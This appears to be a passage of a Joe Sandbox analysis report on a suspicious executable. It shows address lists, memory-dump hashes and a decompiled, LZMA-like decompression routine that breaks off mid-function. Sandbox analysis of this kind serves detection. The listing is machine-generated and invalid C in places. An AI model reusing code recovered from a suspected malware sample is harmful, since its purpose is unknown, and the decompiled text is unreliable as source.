                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x004063a3
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x00000000
                                              0x004065d2
                                              0x004065d6
                                              0x004065f4
                                              0x004065f7
                                              0x004065fe
                                              0x00406601
                                              0x00406604
                                              0x00406607
                                              0x0040660a
                                              0x0040660d
                                              0x0040660f
                                              0x00406616
                                              0x00406617
                                              0x00406619
                                              0x0040661c
                                              0x0040661f
                                              0x00406622
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x00406627
                                              0x004065d8
                                              0x004065db
                                              0x004065de
                                              0x004065e8
                                              0x00000000
                                              0x00000000
                                              0x0040663c
                                              0x00406640
                                              0x00406663
                                              0x00406666
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x00406642
                                              0x00406645
                                              0x00406648
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040665b
                                              0x00000000
                                              0x00000000
                                              0x0040667f
                                              0x00406683
                                              0x00000000
                                              0x00000000
                                              0x00406689
                                              0x0040668d
                                              0x00000000
                                              0x00000000
                                              0x00406693
                                              0x00406695
                                              0x00406699
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x00000000
                                              0x00000000
                                              0x004066f0
                                              0x004066f4
                                              0x004066fb
                                              0x004066fe
                                              0x00406701
                                              0x0040670b
                                              0x00000000
                                              0x0040670b
                                              0x004066f6
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00406731
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x0040673a
                                              0x0040673a
                                              0x0040673d
                                              0x00406744
                                              0x00406749
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x0040662a
                                              0x0040662a
                                              0x0040662d
                                              0x00000000
                                              0x00000000
                                              0x00406969
                                              0x0040696d
                                              0x0040698f
                                              0x00406992
                                              0x0040699c
                                              0x0040699f
                                              0x0040699f
                                              0x00000000
                                              0x0040699f
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x00406979
                                              0x0040697c
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00406a5d
                                              0x00406a5d
                                              0x00000000
                                              0x00406a5d
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b1a
                                              0x00000000
                                              0x00000000
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x00406a1b
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406abf
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af1
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x004066a3
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00000000
                                              0x00406b6d
                                              0x004066ad
                                              0x004066b0
                                              0x004066b3
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
                                              0x00406950
                                              0x00406953
                                              0x00406956
                                              0x00406959
                                              0x0040695d
                                              0x0040695f
                                              0x00406962
                                              0x00000000
                                              0x00406964
                                              0x004066e1
                                              0x004066e1
                                              0x00000000
                                              0x004066e1
                                              0x00406962
                                              0x00406b97
                                              0x00406bb9
                                              0x00406bbf
                                              0x00406bc1
                                              0x00406bc8
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00406bce
                                              0x00406bce
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                              • Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
                                              • Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                              • Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004065D2 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E004065D2() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
